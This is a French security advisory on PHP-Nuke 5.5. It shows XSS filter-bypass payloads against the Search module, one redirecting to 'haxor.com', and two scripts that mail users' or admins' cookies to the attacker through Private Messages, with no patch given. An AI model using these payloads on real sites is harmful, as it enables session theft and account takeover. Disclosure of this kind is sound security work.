PHP-Nuke 5.5
					************

Produit :
*********
PHP-Nuke
http://phpnuke.org

Version :
*********
5.5

Date :
******
03/03/02

Problemes :
***********
- Cross Site Scripting.
- Récuperation des cookies user/admin.

Developpement :
***************

Pas besoin de présenter phpnuke, tout le monde connait...

La faille de cross site scripting se trouve dans le moteur de recherche de phpnuke :
http://HOST/modules.php?name=Search .

Le résultat de la recherche ne s'inscris nulle part, si on fait une recherche à <script>,
rien ne se passera. Si on tape là recherche via une url :
http://HOST/modules.php?name=Search&query=<script>, s'affichera le "I don't like you..." ,
preuve qu'une tentative de détournement du script a été reperée...

Recherchons mainteant "> . Cette faille fonctione : la case du formulaire où devrait
se trouver la recherche est vide et il y a un "> marqué sur la page, entre cette case et
le boutton de recherche.
Ce qu'il s'est en fait passé, comme j'ai expliqué dans mon tuto "Cross Site Scripting",
est que le formulaire a été refermé par le "> qu'on a entré.
Une recherche normale s'inscris dans la source de cette façon (ici on recherche "add-on") :
<input size="25" type="text" name="query" value="add-on">
Notre recherche "> s'inscrira donc comme ceci :
<input size="25" type="text" name="query" value="">">
Le formulaire est donc fermé une 1ere fois, il reste le "> qui étais là a la base, et qui est
maintenant interpreté comme du texte.

Essayons maintenant d'entrer un script :
http://HOST/modules.php?name=Search&query="><script>alert('test')</script>
"I don't like you..." PHPnuke le repere.
Essayons de le faire executer dans une image :
http://HOST/modules.php?name=Search&query="><img%20src="javascript:alert('test')">
"I don't like you..." PHPnuke le repere aussi.
On peut voir dans les essais ici que le "> se met (ce qui est logique) après le texte
inscris.
On peut donc essayer de faire comme pour inscrire du texte, se servir de la source déjà
dans la page pour construire un script.
Il suffit donc d'inscrire :
http://HOST/modules.php?name=Search&query="><img%20src="javascript:location='http://haxor.com'
pour que la page construise 

<input size="25" type="text" name="query" value="">
<img%20src="javascript:location='http://haxor.com'">


La deuxième faille se trouve dans le module Private Messages :
http://HOST/modules.php?name=Private_Messages.

J'ai déjà fait un tuto sur les failles dans les messageries phpnuke, donc pas besoin
de longues expliquations.
Voici 2 scripts qui peuvent renvoyer le cookie d'un admin ou d'un user, ce qui
permet donc de rentrer sur leur compte :

<script>
location='modules.php?name=Private_Messages&file=reply&to_user=YOURNICK&subject=cook&image=icon14.gif&message='
+ document.cookie +'&submit=Submit'
</script>

[IMG]
javascript:location=
'modules.php?name=Private_Messages&file=reply&to_user=YOURNICK&subject=cook&image=icon14.gif&message='
+ document.cookie +'&submit=Submit'
[/IMG]

Patch :
*******
/

Greetz :
********
SubCOrner

Credits :
*********
frog-m@n
leseulfrog@hotmail.com